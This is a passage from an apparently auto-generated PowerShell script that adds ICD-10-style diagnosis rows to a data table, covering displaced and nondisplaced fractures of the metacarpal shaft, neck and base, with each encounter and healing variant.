$DiagnosisList.Rows.Add("Displaced fracture of shaft of third metacarpal bone, left hand","Displaced fracture of shaft of third metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of third metacarpal bone, left hand","Displaced fracture of shaft of third metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of third metacarpal bone, left hand","Displaced fracture of shaft of third metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of third metacarpal bone, left hand","Displaced fracture of shaft of third metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of third metacarpal bone, left hand","Displaced fracture of shaft of third metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fourth metacarpal bone, right hand","Displaced fracture of shaft of fourth metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fourth metacarpal bone, right hand","Displaced fracture of shaft of fourth metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fourth metacarpal bone, right hand","Displaced fracture of shaft of fourth metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fourth metacarpal bone, right hand","Displaced fracture of shaft of fourth metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fourth metacarpal bone, right hand","Displaced fracture of shaft of fourth metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fourth metacarpal bone, right hand","Displaced fracture of shaft of fourth metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fourth metacarpal bone, right hand","Displaced fracture of shaft of fourth metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fourth metacarpal bone, left hand","Displaced fracture of shaft of fourth metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fourth metacarpal bone, left hand","Displaced fracture of shaft of fourth metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fourth metacarpal bone, left hand","Displaced fracture of shaft of fourth metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fourth metacarpal bone, left hand","Displaced fracture of shaft of fourth metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fourth metacarpal bone, left hand","Displaced fracture of shaft of fourth metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fourth metacarpal bone, left hand","Displaced fracture of shaft of fourth metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fourth metacarpal bone, left hand","Displaced fracture of shaft of fourth metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fifth metacarpal bone, right hand","Displaced fracture of shaft of fifth metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fifth metacarpal bone, right hand","Displaced fracture of shaft of fifth metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fifth metacarpal bone, right hand","Displaced fracture of shaft of fifth metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fifth metacarpal bone, right hand","Displaced fracture of shaft of fifth metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fifth metacarpal bone, right hand","Displaced fracture of shaft of fifth metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fifth metacarpal bone, right hand","Displaced fracture of shaft of fifth metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fifth metacarpal bone, right hand","Displaced fracture of shaft of fifth metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fifth metacarpal bone, left hand","Displaced fracture of shaft of fifth metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fifth metacarpal bone, left hand","Displaced fracture of shaft of fifth metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fifth metacarpal bone, left hand","Displaced fracture of shaft of fifth metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fifth metacarpal bone, left hand","Displaced fracture of shaft of fifth metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fifth metacarpal bone, left hand","Displaced fracture of shaft of fifth metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fifth metacarpal bone, left hand","Displaced fracture of shaft of fifth metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of fifth metacarpal bone, left hand","Displaced fracture of shaft of fifth metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of other metacarpal bone","Displaced fracture of shaft of other metacarpal bone, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of other metacarpal bone","Displaced fracture of shaft of other metacarpal bone, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of other metacarpal bone","Displaced fracture of shaft of other metacarpal bone, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of other metacarpal bone","Displaced fracture of shaft of other metacarpal bone, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of other metacarpal bone","Displaced fracture of shaft of other metacarpal bone, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of other metacarpal bone","Displaced fracture of shaft of other metacarpal bone, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of other metacarpal bone","Displaced fracture of shaft of other metacarpal bone, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of unspecified metacarpal bone","Displaced fracture of shaft of unspecified metacarpal bone, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of unspecified metacarpal bone","Displaced fracture of shaft of unspecified metacarpal bone, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of unspecified metacarpal bone","Displaced fracture of shaft of unspecified metacarpal bone, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of unspecified metacarpal bone","Displaced fracture of shaft of unspecified metacarpal bone, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of unspecified metacarpal bone","Displaced fracture of shaft of unspecified metacarpal bone, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of unspecified metacarpal bone","Displaced fracture of shaft of unspecified metacarpal bone, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of unspecified metacarpal bone","Displaced fracture of shaft of unspecified metacarpal bone, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of second metacarpal bone, right hand","Displaced fracture of neck of second metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of second metacarpal bone, right hand","Displaced fracture of neck of second metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of second metacarpal bone, right hand","Displaced fracture of neck of second metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of second metacarpal bone, right hand","Displaced fracture of neck of second metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of second metacarpal bone, right hand","Displaced fracture of neck of second metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of second metacarpal bone, right hand","Displaced fracture of neck of second metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of second metacarpal bone, right hand","Displaced fracture of neck of second metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of second metacarpal bone, left hand","Displaced fracture of neck of second metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of second metacarpal bone, left hand","Displaced fracture of neck of second metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of second metacarpal bone, left hand","Displaced fracture of neck of second metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of second metacarpal bone, left hand","Displaced fracture of neck of second metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of second metacarpal bone, left hand","Displaced fracture of neck of second metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of second metacarpal bone, left hand","Displaced fracture of neck of second metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of second metacarpal bone, left hand","Displaced fracture of neck of second metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of third metacarpal bone, right hand","Displaced fracture of neck of third metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of third metacarpal bone, right hand","Displaced fracture of neck of third metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of third metacarpal bone, right hand","Displaced fracture of neck of third metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of third metacarpal bone, right hand","Displaced fracture of neck of third metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of third metacarpal bone, right hand","Displaced fracture of neck of third metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of third metacarpal bone, right hand","Displaced fracture of neck of third metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of third metacarpal bone, right hand","Displaced fracture of neck of third metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of third metacarpal bone, left hand","Displaced fracture of neck of third metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of third metacarpal bone, left hand","Displaced fracture of neck of third metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of third metacarpal bone, left hand","Displaced fracture of neck of third metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of third metacarpal bone, left hand","Displaced fracture of neck of third metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of third metacarpal bone, left hand","Displaced fracture of neck of third metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of third metacarpal bone, left hand","Displaced fracture of neck of third metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of third metacarpal bone, left hand","Displaced fracture of neck of third metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fourth metacarpal bone, right hand","Displaced fracture of neck of fourth metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fourth metacarpal bone, right hand","Displaced fracture of neck of fourth metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fourth metacarpal bone, right hand","Displaced fracture of neck of fourth metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fourth metacarpal bone, right hand","Displaced fracture of neck of fourth metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fourth metacarpal bone, right hand","Displaced fracture of neck of fourth metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fourth metacarpal bone, right hand","Displaced fracture of neck of fourth metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fourth metacarpal bone, right hand","Displaced fracture of neck of fourth metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fourth metacarpal bone, left hand","Displaced fracture of neck of fourth metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fourth metacarpal bone, left hand","Displaced fracture of neck of fourth metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fourth metacarpal bone, left hand","Displaced fracture of neck of fourth metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fourth metacarpal bone, left hand","Displaced fracture of neck of fourth metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fourth metacarpal bone, left hand","Displaced fracture of neck of fourth metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fourth metacarpal bone, left hand","Displaced fracture of neck of fourth metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fourth metacarpal bone, left hand","Displaced fracture of neck of fourth metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fifth metacarpal bone, right hand","Displaced fracture of neck of fifth metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fifth metacarpal bone, right hand","Displaced fracture of neck of fifth metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fifth metacarpal bone, right hand","Displaced fracture of neck of fifth metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fifth metacarpal bone, right hand","Displaced fracture of neck of fifth metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fifth metacarpal bone, right hand","Displaced fracture of neck of fifth metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fifth metacarpal bone, right hand","Displaced fracture of neck of fifth metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fifth metacarpal bone, right hand","Displaced fracture of neck of fifth metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fifth metacarpal bone, left hand","Displaced fracture of neck of fifth metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fifth metacarpal bone, left hand","Displaced fracture of neck of fifth metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fifth metacarpal bone, left hand","Displaced fracture of neck of fifth metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fifth metacarpal bone, left hand","Displaced fracture of neck of fifth metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fifth metacarpal bone, left hand","Displaced fracture of neck of fifth metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fifth metacarpal bone, left hand","Displaced fracture of neck of fifth metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of fifth metacarpal bone, left hand","Displaced fracture of neck of fifth metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of other metacarpal bone","Displaced fracture of neck of other metacarpal bone, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of other metacarpal bone","Displaced fracture of neck of other metacarpal bone, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of other metacarpal bone","Displaced fracture of neck of other metacarpal bone, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of other metacarpal bone","Displaced fracture of neck of other metacarpal bone, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of other metacarpal bone","Displaced fracture of neck of other metacarpal bone, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of other metacarpal bone","Displaced fracture of neck of other metacarpal bone, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of other metacarpal bone","Displaced fracture of neck of other metacarpal bone, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified metacarpal bone","Displaced fracture of neck of unspecified metacarpal bone, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified metacarpal bone","Displaced fracture of neck of unspecified metacarpal bone, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified metacarpal bone","Displaced fracture of neck of unspecified metacarpal bone, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified metacarpal bone","Displaced fracture of neck of unspecified metacarpal bone, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified metacarpal bone","Displaced fracture of neck of unspecified metacarpal bone, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified metacarpal bone","Displaced fracture of neck of unspecified metacarpal bone, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified metacarpal bone","Displaced fracture of neck of unspecified metacarpal bone, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of second metacarpal bone, right hand","Nondisplaced fracture of base of second metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of second metacarpal bone, right hand","Nondisplaced fracture of base of second metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of second metacarpal bone, right hand","Nondisplaced fracture of base of second metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of second metacarpal bone, right hand","Nondisplaced fracture of base of second metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of second metacarpal bone, right hand","Nondisplaced fracture of base of second metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of second metacarpal bone, right hand","Nondisplaced fracture of base of second metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of second metacarpal bone, right hand","Nondisplaced fracture of base of second metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of second metacarpal bone, left hand","Nondisplaced fracture of base of second metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of second metacarpal bone, left hand","Nondisplaced fracture of base of second metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of second metacarpal bone, left hand","Nondisplaced fracture of base of second metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of second metacarpal bone, left hand","Nondisplaced fracture of base of second metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of second metacarpal bone, left hand","Nondisplaced fracture of base of second metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of second metacarpal bone, left hand","Nondisplaced fracture of base of second metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of second metacarpal bone, left hand","Nondisplaced fracture of base of second metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of third metacarpal bone, right hand","Nondisplaced fracture of base of third metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of third metacarpal bone, right hand","Nondisplaced fracture of base of third metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of third metacarpal bone, right hand","Nondisplaced fracture of base of third metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of third metacarpal bone, right hand","Nondisplaced fracture of base of third metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of third metacarpal bone, right hand","Nondisplaced fracture of base of third metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of third metacarpal bone, right hand","Nondisplaced fracture of base of third metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of third metacarpal bone, right hand","Nondisplaced fracture of base of third metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of third metacarpal bone, left hand","Nondisplaced fracture of base of third metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of third metacarpal bone, left hand","Nondisplaced fracture of base of third metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of third metacarpal bone, left hand","Nondisplaced fracture of base of third metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of third metacarpal bone, left hand","Nondisplaced fracture of base of third metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of third metacarpal bone, left hand","Nondisplaced fracture of base of third metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of third metacarpal bone, left hand","Nondisplaced fracture of base of third metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of third metacarpal bone, left hand","Nondisplaced fracture of base of third metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fourth metacarpal bone, right hand","Nondisplaced fracture of base of fourth metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fourth metacarpal bone, right hand","Nondisplaced fracture of base of fourth metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fourth metacarpal bone, right hand","Nondisplaced fracture of base of fourth metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fourth metacarpal bone, right hand","Nondisplaced fracture of base of fourth metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fourth metacarpal bone, right hand","Nondisplaced fracture of base of fourth metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fourth metacarpal bone, right hand","Nondisplaced fracture of base of fourth metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fourth metacarpal bone, right hand","Nondisplaced fracture of base of fourth metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fourth metacarpal bone, left hand","Nondisplaced fracture of base of fourth metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fourth metacarpal bone, left hand","Nondisplaced fracture of base of fourth metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fourth metacarpal bone, left hand","Nondisplaced fracture of base of fourth metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fourth metacarpal bone, left hand","Nondisplaced fracture of base of fourth metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fourth metacarpal bone, left hand","Nondisplaced fracture of base of fourth metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fourth metacarpal bone, left hand","Nondisplaced fracture of base of fourth metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fourth metacarpal bone, left hand","Nondisplaced fracture of base of fourth metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fifth metacarpal bone, right hand","Nondisplaced fracture of base of fifth metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fifth metacarpal bone, right hand","Nondisplaced fracture of base of fifth metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fifth metacarpal bone, right hand","Nondisplaced fracture of base of fifth metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fifth metacarpal bone, right hand","Nondisplaced fracture of base of fifth metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fifth metacarpal bone, right hand","Nondisplaced fracture of base of fifth metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fifth metacarpal bone, right hand","Nondisplaced fracture of base of fifth metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fifth metacarpal bone, right hand","Nondisplaced fracture of base of fifth metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fifth metacarpal bone, left hand","Nondisplaced fracture of base of fifth metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fifth metacarpal bone, left hand","Nondisplaced fracture of base of fifth metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fifth metacarpal bone, left hand","Nondisplaced fracture of base of fifth metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fifth metacarpal bone, left hand","Nondisplaced fracture of base of fifth metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fifth metacarpal bone, left hand","Nondisplaced fracture of base of fifth metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fifth metacarpal bone, left hand","Nondisplaced fracture of base of fifth metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of fifth metacarpal bone, left hand","Nondisplaced fracture of base of fifth metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of other metacarpal bone","Nondisplaced fracture of base of other metacarpal bone, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of other metacarpal bone","Nondisplaced fracture of base of other metacarpal bone, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of other metacarpal bone","Nondisplaced fracture of base of other metacarpal bone, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of other metacarpal bone","Nondisplaced fracture of base of other metacarpal bone, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of other metacarpal bone","Nondisplaced fracture of base of other 